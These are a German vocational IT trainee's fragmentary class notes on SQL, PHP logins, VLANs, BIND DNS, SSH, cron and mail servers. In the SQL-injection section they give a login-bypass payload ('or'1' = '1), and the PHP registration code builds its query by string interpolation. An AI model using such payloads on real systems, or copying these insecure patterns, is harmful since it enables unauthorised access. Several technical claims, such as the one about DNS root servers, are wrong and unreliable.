AJAX = Asynchronous JavaScript and XML - asynchrone Datenübertragung zwischen Browser und Server. HTTP-Anfragen werden gemacht, während eine HTML-Seite angezeigt wird - Webseiten-DOM wird ohne erneutes Laden verändert

Von JS gibt es verschiedene Frameworks

Windows: systemeinstellungen → Windows updates → sprache ändern

.. portscan von zu Hause und nicht unterschreiben lassen von seinem chef, dass er das darf. Wenn von aussen überprüfe, ob seite gegen hacking sicher ist, vom chef unterschreiben lassen!

Häufigste hackerangriffe: Social engineering? Geheimhaltung gegenüber firma, auftrag geheimhalten, auch wenn man biere spendiert bekommen.

Nicht die Leute sind schuld, sondern die, die schulen müssen.

Code engeneering.

Niemals gleiche passwörter nehmen

..

Ohne Datum Compiler und Interpreter

Zitat: „Compiler und Interpreter sind Implementierungsformen von Software. Generell geht es beim Compilieren und Interpretieren darum, den Quelltext, der mit einer höheren Programmiersprache (zum Beispiel C++, C# oder Java) geschrieben wurde, in Maschinenbefehle umzusetzen. Das bedeutet, die lesbaren Programmierbefehle müssen in weniger komplexe Instruktionen übersetzt werden, damit der Prozessor diese ausführen kann.“

Unterschied zwischen Compiler und Interpreter: „Ein Interpreter (im Sinne der Softwaretechnik) ist ein Computerprogramm, das einen Programm-Quellcode im Gegensatz zu Assemblern oder Compilern nicht in eine auf dem System direkt ausführbare Datei übersetzt, sondern den Quellcode einliest, analysiert und ausführt. .. Anders als beim Compiler übersetzt der Interpreter nicht vorher, sondern während des Programms den Quelltext. Deswegen ist die Ausführungszeit beim Interpreter deutlich langsamer. Der Interpreter erzeugt keinen speicherbaren Maschinencode.“ z.B. PHP, Python und Javascript sind alles Interpretersprachen. „Der Compiler ist ein Programm, der aus dem Quelltext das eigentliche Programm erstellt. .. In der Praxis ist es so, dass Prozessoren und Betriebssysteme einen Kompatibilitätsmodus haben, so das alte Programme auch auf neuen Plattformen laufen. So müssen compilierte Programme nicht immer neu compiliert werden. Aber die Kompatibilität hat natürlich ihre Grenzen. ... Übersetzt wie der Interpreter auch den Quelltext für ein Programm, dass man in der Informatik auch als Quellprogramm bezeichnet, in für den Computer lesbare Zeichenfolgen. Der Unterschied ist aber, dass der Compiler die Übersetzung vor der Laufzeit des Programms beendet.“ z.B. c &c++.

Dann gibt’s noch Hochtechnologie:

„Java-Compiler und Java VM“ „PHP ist ein System, das PHP-Code serverseitig verarbeitet. Das bedeutet, dass der Quelltext nicht an den Webbrowser übermittelt wird, sondern an einen Interpreter auf dem Webserver.“

Diese URL enthält einen Query String: http://www.example.org/suche?stichwort=wiki & ausgabe=liste.

20.10.2016: SQL mit Antje

SQL müssen wir beten können

Chefs: nie alle Rechte geben, sonst machen sie alles hinüber. SQL = CaseInsensitive; außer, bei den Spalten.

Ganz neu: INSERT INTO tbl (sp1,sp2, sp3) VALUES (5, 'walzer', '18'); Verändert: UPDATE tbl SET sp1='4' where sp3 ='5': mysql> update buecher set B_jahr='1979' where B_jahr='1985';

Hinter DELETE FROM kein Sternchen machen, sonst ist alles weg!!!

Übersicht: Datenbanken + Sicherheit, sowie PHP + Sicherheit.. show tables;

Data Definition Language (Database Creator): zum ändern, beschreiben und löschen...

Varchar = Datentyp NOT NULL = Es muss was reingeschrieben werden ALTER TABLE tbl add

SQL & Sicherheit: Die Data control Language unter Mysql und Mysqli verwaltet die Userrechte. z.B. mit GRANT, UPDATE on table adressen to groupx. Gestaltet user und group lesend & ändert Zugriff auf die Tabelle 'adressen'. Revoke execute on procedere

Revoke execute on procedere bla from public; = entzieht allen nicht explizit berechtigten Usern das Recht, Bla auszuführen. ALTER TABLE tabelle_cd ADD Land varchar(255); bis 255 kann man bei varchar maximal gehen

Führende Null ist oktal Hexadez 0 = ox .. . Das Oktalsystem (von lateinisch octo ‚acht') ist ein Stellenwertsystem mit der Basis 8

Es gibt noch mehr Untersprachen von MySQL... Data Manipulation Language

Transaction Control Language

--

Es gibt auch Probleme mit der Redundanz, da doppelte Datensätze & damit keine Konsistenz.

Normalform drüber fahren (niemals mit der dritten anfangen).

IHK-relevant: Die nullte Normalform muss vorliegen und jedes Attribut muss atomar (unteilbar) sein.

Also, dass Tabellen nich tmehr gebrochen werden können, oder?

SQL-Datentypen:

integer, number, float(m), character, varchar, date, boolean, raw, number (n, m) oder decimal (n,m) Festkommazahl (positiv oder negativ) mit maximal n Stellen, davon m nach dem Komma.

Fette Sachen rein schreiben (blob) sollte man allerdings vermeiden. Lieber rawtype verwenden, dort werden nur die bits gespeichert, 01100010101010010100101010101101.

Mit einem 4 Byte großem Zeiger wird dann der Text gelesen.. Immerhin 32 bit groß.

Forensik .. halber bis dreiviertel Tag. Wie kann ich angriffsvektoren sichern, dass es vor der Polizei gültigkeit hat und vor den Richter.

& = & amp; = hat das was mit Forensik zu tun??

..

UPDATE Tbl SET (Spalte = neuer Wert) DELETE FROM Tbl WHERE id=5

ALTER TABLE tabelle_cd ADD Land varchar(255); weiter als 255 geht varchar glaub ich nicht.. .

Eine m zu n muss zwingend durch eine Zwischentabelle aufgelöst werden??

Hash: Aus einer Zeichenkette eine eindeutige Nummerierung macht. Um alles zusammen zu bringen: Eric Clapton und JJ. Cale sind gemeinsam auf einer CD: select * from tbl_cd , tbl_interpret , tbl_relation where tbl_cd.CDNr = tbl_relation.CDNr AND tbl_relation.InterpretNr = tbl_interpret.InterpretNr Unter Windows direkt ins Mysql: c\xampp\mysql\bin>mxsql.exe -h localhost -u root -p Dann das Passwort eingeben.

..

DBS = Datenbanksystem.

Relationale Datenbanksysteme .. mit objektwrapper objektorientierte Spachen ablegen.

Die Begriffe Objektorientiert, Funktional und prozedural sind Paradigmen von Programmiersprachen. Und relational?

Die Sprachen haben unter sich verschiedene PAradigmen, z.b. PHP ist objektbasiert, aber auch prozedural. Aber, was der Unterschied zwischen den Paradigmen an sich ist?? Aspektorientiertes Paradigma: typgeprüft: für AE ganz wichtig. PHP und JS sind nicht typgeprüft.

Für m : n gilt, dass alle schüler in eine klasse gehen, aber nur weil einer kungfu macht, machen nicht alle kungfu. .. .oder?

Ohne Datum SQL-Injection: zitat: „SQL-Injection (dt. SQL-Einschleusung) bezeichnet das Ausnutzen einer Sicherheitslücke in Zusammenhang mit SQL-Datenbanken, die durch mangelnde Maskierung oder Überprüfung von Metazeichen in Benutzereingaben entsteht. Der Angreifer versucht dabei, über die Anwendung, die den Zugriff auf die Datenbank bereitstellt, eigene Datenbankbefehle einzuschleusen. Sein Ziel ist es, Daten auszuspähen, in seinem Sinne zu verändern, die Kontrolle über den Server zu erhalten oder einfach größtmöglichen Schaden anzurichten.“ man kann auch in php/mysql mit union wo „reinhacken“ (hinter logwall verbergen).

Wenn ich ausbreche, habe ich Macht, auf SQL zu arbeiten.

In diesem Zusammenhang hatten wir noch mal Wahrheitstabellen (And, or, xor). Wieso eigentlich?

Hat wohl was mit dem reinhacken in das username-Fenster zu tun: Username: 'or'1' = '1 PW:

Sicherungsform: mysql_real_escape_String

Fremdsoftware sollte man niemals hacken, sonst 5 Jahre Gefängnis.

Ich vermute, wir hatten noch mehr im Unterricht mit Antje in dieser Woche gehabt..

Schleife in php (hat sehr viel von c++ genommen).

Was ist ein kartesisches Produkt? Wenn man mit “select join books, mails”, oder so ähnlich, tabellen ganz zusammenhangslos aneinanderklebt!

Überprüfung der Daten mit der Checksum. CSDB.

Asso: Aggregation und Komposition.

Ohne Datum Vererbung in der Datenbank:

Wenn viele Felder leer sind, über Vererbung nach denken. Joinen hatten wir auch. select * from autor join autor on buch; ← achtung, geht nicht

25.10.2016: PHP: Sessions, Userverwaltung, Sicherheit mit Jan Hill

Sessions .. und womöglich das mit den guten Login und Passwortschutz mit dem SALT-Algorithmus .. .

… registrierung.php registrierung.php

Registrierung

user dopplung prüfen wenn nicht mit sha 512 + salt eintragen session user anlegen link zu geheim.php

query($sql); $result = $res->fetchColumn(); // wird damit die ganze Säule //genommen ?? if($result){ echo "Ist vorhanden"; return false; }else { $sql="INSERT INTO tb_login (user,pass) VALUES ('{$user}','{$crypt}')"; $erg = $connect->exec($sql); // Anfrage datenbank return $erg; //gibt menge der betroffenen Zeilen zurück } } if(isset($_REQUEST['user']) && isset($_REQUEST['pass'])) { $user = $_REQUEST['user']; $pass = $_REQUEST['pass']; if(ctype_alnum($user)){ // nicht nur sonderzeichen, //sondern verweisen von a-z 0-9 if(insertPass($user,$pass))$_SESSION['user'] = $user; // von request zu session } } if(isset($_SESSION['user'])){ // Diese Session ist ein Array header('location: geheim.php');




fetchColumn(); PDOStatement::fetchColumn — Returns a single column from the next row of a result set isset = Prüft, ob eine Variable existiert und nicht NULL ist. ctype_alnum — Auf alphanumerische Zeichen überprüfen.

PDO = PHP Data Objects oder kurz PDO stellt eine Abstraktionsebene für den Datenbankzugriff dar und ermöglicht einen einheitlichen Zugang von PHP auf unterschiedliche SQL-basierte Datenbanken, wie zum Beispiel MySQL, PostgreSQL oder SQLite. Dabei wird unter anderem der Portierungsaufwand beim Umstieg auf eine andere Datenbank minimiert. Es wird nur der Datenbankzugriff abstrahiert, nicht die Datenbank selbst. Für die zu nutzende Datenbank wird ein datenbankspezifischer Treiber benötigt.

Ich dachte erst, PDO wäre ein Allround-Heilmittel, um die Datenbankabfrage zu erleichtern. Funktionieren tat es während eines Ausprobierens in einer Selbstlern-Aufgabe in Antjes Unterricht aber nicht. Und Treiber benötigten wir auch snicht.

PDO ist objektorientiert aufgebaut und kann im Gegensatz zum Pendant MySQLi nicht prozedural benutzt werden. Die objektorientierte Umgebung erleichtert den Entwicklern das Erweitern der Schnittstellenfunktionalität.

Etwa, weil PDO- und mysqli-Abfragen unterschiedlich sind? Aber, php7 nimmt doch nur noch mysqli an, wieso sollte es zwischen der „normalen“ mysqli-Anfrage und PDO noch Probleme geben bzw. PDO sogar nachteilig sein?

26.10.2016: Linux: Vortrag erarbeiten und vortragen(Netzwerke) mit Ingo Droß

Das Dynamic Host Configuration Protocol (DHCP) ist ein Kommunikationsprotokoll in der Computertechnik. Es ermöglicht die Zuweisung der Netzwerkkonfiguration an Clients durch einen Server. Was ist überhaupt die Netzwerkkonfiguration? So weit ich weiß, setzt der DHCP jede 12 Stunden einem Rechner eine neue IP zu, oder? DHCP wurde im RFC 2131 definiert und bekam von der Internet Assigned Numbers Authority die UDP- Ports 67 und 68 zugewiesen.

DHCP ermöglicht es, Computer ohne manuelle Konfiguration der Netzwerkschnittstelle in ein bestehendes Netzwerk einzubinden. Nötige Informationen wie IP-Adresse, Netzmaske, Gateway, Name Server (DNS) und ggf. weitere Einstellungen werden automatisch vergeben, sofern das Betriebssystem des jeweiligen Computers dies unterstützt.

* hops (1 Byte, optional): Anzahl der DHCP-Relay-Agents auf dem Datenpfad

* flags (2 Byte): Z. Zt. wird nur das erste Bit verwendet (zeigt an, ob der Client noch eine gültige IP-Adresse hat), die restlichen Bits sind für spätere Protokollerweiterungen reserviert Der Part von Mathias und mir zur klassenweiten Vortragsreihe:

Ein Switch:

1. Kommunikation über Switche: Der Switch ist eine kleine Weiche innerhalb eines lokalen Netzwerkes (LAN). Sie leitet die Datenpakete, welche von den Clients über eine MAC-Adresse gekennzeichnet sind, an den Router weiter. Der Switch speichert alle MAC-Adressen der Rechner in seinem Netzwerk über eine Routing-Tabelle. Will ein Rechner innerhalb des LAN's gezielt einen anderen Rechner ansprechen, kann der Switch dank der Routing-Tabelle das Datenpaket gezielt an den anderen Rechner weiter leiten. Das dabei verwendete Ethernetframe bleibt davon unangetastet und wird erst im Router verändert, wenn es ins Internet raus geht.

2. Vlan: Moderne Switche können mehrere Lan's in einem Gerät verwalten (ab Layer 2 - Switchen). Diese Lan's sind Vlans. Will ein Rechner vom Vlan1 mit einem Rechner in Vlan2 kommunizieren, kommuniziert der Switch auch über die Routingtabelle des Switches, allerdings werden die Datenbankpakete im optionalem Bereich um 4 Bytes vergrößert, um das VLAN Tag zu schreiben.

Solch ein Datenpaket wird vom Switch ausgelesen. Dieser sendet das Paket an alle vorhanden Vlan's. Allerdings wird es nur vom Vlan mit dem richtigen Vlan-Tag angenommen.

Wenn die Netzwerkkarte das Vlan-Taggen übernimmt, überspringt der Switch diesen Schritt und schickt es direkt an das hinzugedachte VLAN.

Die Vlan Struktur findet ihren Einsatz in Großen Firmennetzwerken, wo es wegen unübersichtlichen Strukturen in Verteilerschränken schwer ist, Netzwerksegmente zu verschieben. Darüber hinaus ist die Verwaltung bequem über eine Software möglich.

Gez: Max, mit großer Unterstützung von Mathias

Multithreading: mehrere prozesse auf einmal, aber mit Windows? Notizen aus anderen Vorträgen:

Server über konsole bedient muss nicht nutzerfreundl sein daten müssen in echtzeit präsentiert werden windowsrechner ist wegen support in vier jahren teurer als ein mac.

Smb unabhängig von windows .. schicht 4. dhcp .. netzweradministrator eingetragen.

UDP: port 547 user und dhcp: dhcp discover message dhcp-ack dhcp-server sendet an den dns-server und im osi-modell: anwendungsschicht. Hierarchisch erweiterbar redundant ist wichtig, wegen hckerangriffen.

IP = anbindungen von anwendungen ipv4: adress und host. ipv6: traffic und interface tcp, was in das ip verkapselt ist, portnummer ip 3 wege handshake einer anfrage, ja habe zeit, okay, dann fangen wir an. Über portnummer im header kann datenpaket an die richtige anmeldung.

Twisted pair:

Cat 1 – kabel 4mb-frequenz? Cat 8 b g n wifi übertragungs welle: dbm dezibel miliwatt. Antennen 50 dbm.. Leistungspegel ?? dB (Dezibel) ist die Einheit des Leistungspegels LP, der das Verhältnis einer Leistung P im Vergleich zu einer Bezugsleistung P0 beschreibt.

wifi ohne zentralen wlan access point. 2,4 und 5ghz benutzt, da sie nicht von radio oder fernsehsignalen belegt sind. Osi von der iso 1979 vor geschlagen, modular und in 7 schichten layer aufgeteilt.

Von oben bis unten: Es werden header hinzugefügt und wieder entfernt. Sicherungsschicht: kontrolle der bitübertragungsschicht, sequenzüberwachung & flusskontrolle. Ab da: Datenpakete = frames, oder?? 3. network layer datagrammen. Zuweisung von logischen Adressen.

5. Session layer, stellt benutzer über sitzungen möglichkeit, mit anderen usern zu verbinden. 6. codierung und decodierung von daten in ein betriebssystem unabhängigen format und für komprimierung und verschüsselung 7. application layer.. bnetzwerkzugriff browser

shane: standleitung unternehmen und privaten endkunden benutzt als drahtverbind. Realisiert worden. In brd kupferleitungen lwl speicher: festplattenkapazität, aber eher software die installiert wird. Besonders schnelle netzwekkarte zum Austausch zw. Server und client. Ausfallsicherheit: server zu cluster, in einem cluster unteriander zusätzl. Verbindungen. netzwerkkarte Netzwerkinterface verbindet computer mit netzwerk. Elektromagnetische schwingungen/signale

https://www.google.de/search? q=layer+3+switc h

& source=lnm s & tbm=isch & sa=X & ved=0ahUKEwj5u92sofjPAhVMNxQKHT85BjoQ_AUICSgC & biw=1280 & bih=887 http://www.netzmafia.de/skripten/netze/netz8.html https://de.wikipedia.org/wiki/IPv4 https://de.wikipedia.org/wiki/Datenframe

27.10.2016: Linux: DNS und DHCP mit Ingo apt install bind9utils

Zitat: “BIND ist ein von der Universität Berkeley (USA) entwickelter DNS-Server, der eine hohe Verbreitung in mittleren bis großen Netzen findet.” nano /etc/resolv.conf nameserver 192.168.22.254 als ich die ip-nummer bekommen hatte, ist mir der nameserver gegeben worden (auf Ausbildung).

Wenn wir taz.de eintippen, wird der proxy nach der domain gefragt.

Man kann nicht im klassenraum einen ping ins internet machen.

Die DNS-Root-Server gibt es nur sieben Mal und nur in den usa. Sie lösen die tld auf.

Denic.de verwaltet alle *.de-adressen.

Netcup ist der provider der fisicloud.de https://www.netcup.de/hosting/ mail.taz.de = mail ist subdomain, der dns-server könnte mehrere ebenen eingetragen haben. Braucht für jede Ebene eine Konfigurationsdatei.

Für eine große Firma das Netzwerk einrichten: Die beiden Namneserver sollen nicht im selben Subnet sein, damit sie redundant sind.

De-domain registrieren bei denic.

Wir wollen eine eigene domain verwalten mit dns-server master-slave.. die serial-number endet sich bei jedem Eintrag, den ich mache. TTL = timetolive

Erst de einträge für: ns → nameserver mx → mail exchange A → adresse ip

Zitat: “Wenn nur IPv4 verwendet wird, sollte der Paramter "-4" in /etc/default/bind9 unter OPTIONS="..." hinzugefügt werden. Dies steigert die Performance drastisch.” Drastisch .. . nicht notwendig, oder? „Da der Server zu diesem Zeitpunkt sowieso noch keine sinnvolle Konfiguration besitzt, wird er erst einmal gestoppt: sudo /etc/init.d/bind9 stop“

-numbe topleveldomain =*.max name = *.maxworld

; ; BIND data file for local loopback interface ; $TTL 604800 @ IN SOA maxworld. root.maxworld.max. ( 3 ; Serial ;die serial-nummer muss bei jeder Änbderung rauf gezählt werden 604800 ; Refresh 86400 ; Retry 2419200 ; Expire 604800 ) ; Negative Cache TTL ; NameSrv host.zone.toplevel @ IN NS deb-saiyajin.maxworld.max. @ IN MX 10 deb-saiyajin.maxworld.max. Hostname Mx = mailExchange deb-saiyajin IN A 192.168.22.205 = meine IP-Nummer proxy IN A 192.168.22.254 bla IN A 192.168.22.20 bilder IN A 192.168.22.21

/etc/bind# nano db.maxworld

Dann frage ich meinen eigenen Host nach der domain:

Zitat:“ ; <<>> DiG 9.9.5-9+deb8u7-Debian <<>> deb-saiyajin.maxworld.max @192.168.22.205 ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 623 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;deb-saiyajin.maxworld.max. IN A

;; ANSWER SECTION: deb-saiyajin.maxworld.max. 604800 IN A 192.168.22.205

;; AUTHORITY SECTION: maxworld.max. 604800 IN NS deb-saiyajin.maxworld.max.

;; Query time: 0 msec ;; SERVER: 192.168.22.205#53(192.168.22.205) ;; WHEN: Thu Oct 27 12:37:32 CEST 2016 ;; MSG SIZE rcvd: 84 root@deb-saiyajin:/etc/bind#”

.. alternativer name nuername IN CNAME aster proxy22 IN CNAME proxy www IN A 192.168.22.121 www IN A 192.168.22.213 dig www.blume.de @localhost

.. typo3 läuft nicht, wenn datenbanken keine ip's haben.

Typo 3 basiert auf php .. named-checkzone maxworld.max /etc/bind/db.maxworld

..

Vermutlich DNS: ; ; BIND data file for maxworld.max ; $TTL 604800 @ IN SOA maxworld. root.maxworld.max. ( 7 ; Serial 604800 ; Refresh 86400 ; Retry 2419200 ; Expire 604800 ) ; Negative Cache TTL

; grund config NS/MX nameserver mailexchange @ IN NS deb-saiyajin.maxworld.max.

@ IN MX 10 deb-saiyajin.maxworld.max.

; folgende Rechner sind in der Zone ;deb-saiyajin.maxworld.max deb-saiyajin IN A 192.168.22.205 mmm IN CNAME deb-saiyajin proxy IN A 192.168.22.254 bla IN A 192.168.22.20 bilder IN A 192.168.22.21 silvia IN A 192.168.22.22 islugan IN A 192.168.22.23 www IN A 192.168.22.224 =lot-balancing www IN A 192.168.22.2 =lot- balancing

Beim lot-balancinbg wird ein Name auf mehrere Rechner verteilt.. ein DNS kann das!

..

Samba = wie kriegt man linuxrechner sichtbar in windows? Samba! Git = um programmcode zu verwalten watcher = (watcher split-brain github) CRON

..

Samba: Zitat: “Der Name Samba stammt vom Server Message Block-Protokoll (SMB, inzwischen erweitert und in CIFS umbenannt). Unter GNU/Linux ist Samba das Bindeglied zu anderen Betriebssystemen wie z.B. MS- Windows®, aber auch zu Unix, BSD oder Mac OS X®. Samba bietet umfangreiche Möglichkeiten für den Datenaustausch sowohl in gemischten als auch in homogenen Netzwerken. So erstreckt sich der Einsatz von Samba vom einfachsten Heimnetzwerk bis hin zu großen Windows-Netzwerken mit aufwendigen Strukturen.”

Typo 3 Zitat: “TYPO3 CMS ist ein freies Content-Management-Framework für Internetseiten, das seit Oktober 2012 offiziell unter dem Namen TYPO3 CMS angeboten wird. Ursprünglich wurde TYPO3 von Kasper Skårhøj entwickelt. TYPO3 basiert auf der Skriptsprache PHP. Als Datenbank kann MySQL oder MariaDB, aber auch PostgreSQL oder Oracle eingesetzt werden.”

Git Zitat: “Git [ɡɪt] ist eine freie Software zur verteilten Versionsverwaltung von Dateien, die durch Linus Torvalds initiiert wurde. .. Durch eine Lizenzänderung des bis dahin genutzten, proprietären BitKeeper- Systems konnten die Linux-Kernel-Entwickler dieses nicht mehr kostenlos verwenden und somit blieb vielen Entwicklern der Zugang verwehrt. Daher begann Linus Torvalds im April 2005 mit der Entwicklung einer neuen Quellcode-Management-Software und präsentierte bereits wenige Tage nach deren Ankündigung eine erste Version.”

28.10.2016: Netzwerke - VLAN's mit Hr. Rüdiger

Weil wir in einem anderen Raum sind, kann ich mein Debian nicht benutzen.

Bei Behörden sollte man sich früh bewerben. Charite: Man kann richtig Glück haben Netzwerkabteilung. .. die haben richtig teure technik. Aber man wechselt immer nur PC´s aus .. . Aber, für die Projektarbeit ist es scheiße. Lieferanten: machen alles aus einem festen Pool raus.

In der Programmierung: Während des Praktikums gibt es Projektarbeit: 70 Stunden pro Woche. Systemintegratoren: Netorus GmbH. Bundestag: kümmern sich sehr um die Projektarbeit.

Arbeitslage: Sehr gut .. neues Berufsbild auf gemacht. Programmierer als Ausbildung. Ausbildung: Mathematisch-technischer Assistent. Außer SQL gibt’s keine programmiersprachengebundene Ausbildung.

Hr. Rüdiger: Haben c gemacht. Norton Commander nach programmiert.

Layer-3-Switch kann auch IP´s verwalten… Vlan´s. Virtuelle Ports.

Router:Accesspoint drin, switch drin.

Fritzbox: Routen von internen zu externen Netzen. .. Multifunktionsgerät. Telefonanlage, Access-Point, Switch, Modem, Voip, Analog. Voip ist am einfachsten über Analog – gerade bei Firmen.

Sind sie ehrlich, oder wollen sie nur eine einfache Arbeitskraft.

Wenn man besser ist als Note Zweiandhalb, kann man Ausbildung verkürzen.

Dect = verkürzt, das könnte voip nicht.

Voip übernimmt die gesamte umwandlung von paketorientierung, de daten in ein Gespräch

Was ist ein Uplink? Wenn man switche verbindet.

Crossover-Kabel werden verwendet. Die buchsen der netzwerkkarten sind anders geschaltet als wie beim switch. Lesen und schreiben müssen sich gegenüberstehen. Schreibt die Netzwerkkartze, liest die Netzwerkkarte des anderen.

Von netzwerkkarte zu nwk und von switch zu switch muss mindestens ein crossover-kabel dabei sein.

Rechner kann nur an die ports bc senden, wo data dranhängt.

Layer2-switch reicht für vlan-tag 12bit aus. Switch: kriegt Nummer von 1 bis 1096s ein wirkliches netz ist nur das lokale.

Man kann manchmal mit mac-adressen nicht den computer im selben netz erreichen. Unterscheidt sich nach vlan, aber mathias sagt nein, ernn .

.. Dynamische zuweisung unter switchen. Radius-server authentifiziert mich. Darüber wird die Abrechnung drüber gemacht.

.. Wpa normale. Wpa enterprise: kriege ich eine Maske auf.. mit ip-adresse, ascii-format, index, benutzername passwort. Das allein kann man in einem arduino machen, das wpa-paket. Den Radius-server kann man auf einem ardius-server drauf machen.

RWT-router sollten sich verlinken können. Damit könne man allen scheiß machen.

Man hat das wlan auf enterprise gemacht und auf radius gemacht, einen authentifizierungsserver.

Wie kann man die ascii-zeichen auf der tastatur schreiben?

Man muss den datenverkehr zum Authentifizierungsserver offen halten.

Router arbeiten nur mit ip-adressen.

Wenn man in der routingtabelle 0.0.0.0 0.0.0.0 eingibt, geht das immer ins internet raus, weil es dann heißt: nimm alle ip-adresse und jede Maske von 0.0.0.1 bis 255.255.255.255 . andere Texte hier noch unter bringen.

--

Zum Thema foreach-schleife und array: Iteration (von lat. iterare ,wiederholen') beschreibt allgemein einen Prozess mehrfachen Wiederholens gleicher oder ähnlicher Handlungen zur Annäherung an eine Lösung oder ein bestimmtes Ziel.

Funny translations: Sneak means colarse = Die schleichende Kolartsche! Zielwasser = Aqua Objetivo Orientar agua.

Foreach-Schleife: “Ya sea que allí matrices normales o asociativos se utiliza independientemente.” “Ob ihr dort normale oder assoziative Arrays verwendet ist egal.”

Ich hatte mir gerade eine foreach-schleife angeschaut. Sie funktioniert mit einfachen Arrays: “Die foreach-Schleife funktioniert ebenfalls bei assoziativen Arrays. Dort können wir sogar zusätzlich angeben, dass wir den Schlüssel des assoziativen Arrays ebenfalls als Variable abspeichern möchten:”

"asozial","Peter" => "Untergang der Zivilisation","Lisa" => "hat keine Hemmungen","kacke" => "im Klo","foreachschleife","doch foreachschleife!!!!$ echo "Foreach-Schleife:
"; foreach($mitarbeiter AS $name => $line) { echo "$name $line
"; ?>

mehrdimensionale Arrays

-- 30.10.2016: Freizeit … es wäre cool, wenn ich im Loginbereich von php..

..einen Check auf Echtheit einbauen könnte (if(filter_var($email,FILTER_VALIDATE_EMAIL)){)... ..muss sich mit Datenbank verbinden können und überprüfen, ob es doppelte Einträge gibt...... der User soll sich wieder raus löschen können...... dafür müsste ich eine foreach-Schleife beherrschen...... ( foreach($arr as $index => $line){ )... .. gleichzeitig mit SALT das Ganze nicht mit einem mp5-Generator zu knacken wäre...

Foreach ist das Stichwort! Auch alles andere müssen wir können, sonst werden wir von Java gefressen, dass in einandhalb Wochen dran kommt!

– Mit Schleifen kann man auch Farben machen !! –

31.10.2016: Linux: zeitbasierte Aktionen mit CRON, mit Ingo Droß rsync up -r quelle ziel rsync -av quelle ziel

Auf dem Hauptrechner: ssh-keygen machen dann cat .ssh/id_rsa.pub 3. Schlüssel kopieren (nicht den Prompt mit kopieren)! 4. im Zielrechner unter .ssh/authorized_keys den Schlüssel einfügen 5. Test-Login mit ssh -p22220 [email protected] Dann sollte man passwortlos eingeloggt sein

Zusätzlich kann man sich im Ordner .ssh/ des Homerechners eine config-Datei anlegen, um sich dann kurz&knackig anzumelden!

Host fc HostName 188.68.50.27 Port 22220 user phantasy2 identity file /home/max/.ssh/id_rsa

Achtung! Die Config-Datei ist unvollständig!

Und wozu jetzt? scp -r /tmp/alt/a: scp -r /tmp/alt/fc: Darunter hatte ich notiert: “Er geht ins Home-Verzeichnis des Servers”. syncAntares.sh :

.. #!/bin/bash

LOGFILE=/tmp/cron.log rsync -av -e "ssh -l phantasy2" /home/max/script/2web/ antares:public_html >> /dev/null echo -en "sync nach antares public_html" >>$LOGFILE; echo $(date) >> $LOGFILE exit 0; .. script starten cron crontab -l ← list -e ← edit, verwalten, neu anlegen -r ← remove m std. DOM M DOW Monat Wochentag 15 13 * * * m std. DOM M DOW Minuten Stunden Tag/Monat Monat Tag/Woche * * * * * = jede Minute 10 19 24 12 * 28 8 * * 1 */5 8,9,10,11,12,13 * 13,25,58 13 * * 2 crontab -e

*/5 * * * * /home/max/syncantaresweb.sh heißt: aktiviere alle fünf Minuten dieses Shell-Script

Jonas zeigte mir heute, wie man die extensions von gedit aktiviert, um auto-vervollständigen zu nutzen.

Zitat: “ARP-Spoofing zu erkennen oder zu verhindern ist nicht einfach. Dazu gibt es mehrere Möglichkeiten. Eine davon ist, das ARP ganz außen vor zu lassen und mit statischen Tabellen zur Umsetzung von IP- Adressen zu Hardware-Adressen zu arbeiten. “

1.11. 2016 Linux: Event basierte Aktionen mit Watcher mit Ingo Droß scp kann lesen, verschlüsseln und kopieren less: zeilenweise runter scrollen

1. unter Root mkdir /root/watcher-splitbrain anlegen 2. Autologin ssh auf den Zielserver

3. apt install git 4. google: git watcher splitbrain 5. git clone https://github.. .git

6. damit der Watcher an unserem Proxy vorbei kommt (oder proxy schon früher setzen). git config –global http.proxy http://192.168.22.254:3128 git config –global https.proxy https://192.168.22.254:3128

7. apt install pyinotify 8. apt install python_pyinotify 9. apt install python_configparser imagemagick

10. git config –global http.proxy http://192.168.22.254:3128 media/pics media/thumbs convert -resize 120 x 120 bild.jpg kleinBild.jpg watcher.ini konfigurieren.. sagesmir.sh echo -en $(date) >> /bin/watcher-splitbrain/sagen.txt watcher.ini Pfad zur SagesMir.sh

./watcher.py start -c watcher.ini

Hinterher: ./watcher.py stop -c watcher.ini

Es ging auch um so Bilder thumbMe.sh

Thema: watcher url

https://github.com/szepeviktor/Watcher-splitbrain

# clonen holen des python prg... git clone https://github.com/szepeviktor/Watcher-splitbrain.git

Thema: git proxy

Einstellen: git config --global https.proxy https://192.168.22.254:3128 git config --global http.proxy http://192.168.22.254:3128

Prüfen: git config --global --get http.proxy git config --global --get https.proxy

2.11.2016 Linux: Startscripte, Bootvorgang, systemd mit Ingo Droß

Runlevel: “Der Begriff Runlevel bezeichnet einen Betriebszustand von Computern. Er hat vor allem beim Start des Betriebssystems Bedeutung. Der Runlevel ist vor allem bei unixoiden Betriebssystemen bekannt, jedoch auch bei anderen Betriebssystemen vorhanden.” rc.local Möchte man eigene Dienste, Skripte oder Programme, die keinen Eintrag in den Runleveln besitzen, beim Systemstart automatisch laden, so kann man diese in die Datei /etc/rc.local eintragen. Dabei entfällt die Verwendung von sudo – Einträge werden immer mit Root-Rechten ausgeführt.

Einschalten → bios → bootloader → minisys → kernel module → linux

Wenn Grub “Gr” sagt, hat er die platte nicht mehr laden können.

Es gibt keinen Befehl, der zeigt, wieviele Mikrokernel-Module Windows nach lädt.

Kernel: Lsmod = zeigt alle Kernel auf Linux an. Kernel macht Linux aus modprobe → um Kernelmodule dazu zu laden.

Mit git.clone kann man sich den c-code von Linux besorgen.

Was ist ps –pid 1 -f ??

Runlevel (hatte man früher gehabt) systemd = Boot-Umgebung.

Ganz viel...

Achtung: init1 zerfetzt system; setzt es in den Rescue-Mode

.. kategorisieren ..

Technical Artist: Jemand von den Mediengestaltern hatte mich beraten .. .

3.11.2016 Linux: Mailserver und Imap mit ingo Droß

https://thomas-leister.de/sicherer-mailserver-dovecot-postfix-virtuellen-benutzern-mysql- ubuntu- server- xenial/ zitat: “(DSL-Adressbereiche werden von fremden Servern oftmals blockiert, daher empfehle ich, einen kleinen, günstigen, virtuellen Server in einem Rechenzentrum anzumieten.”

echo "$USER:{PLAIN}password:$UID:$GID::$HOME" >> /etc/dovecot/users

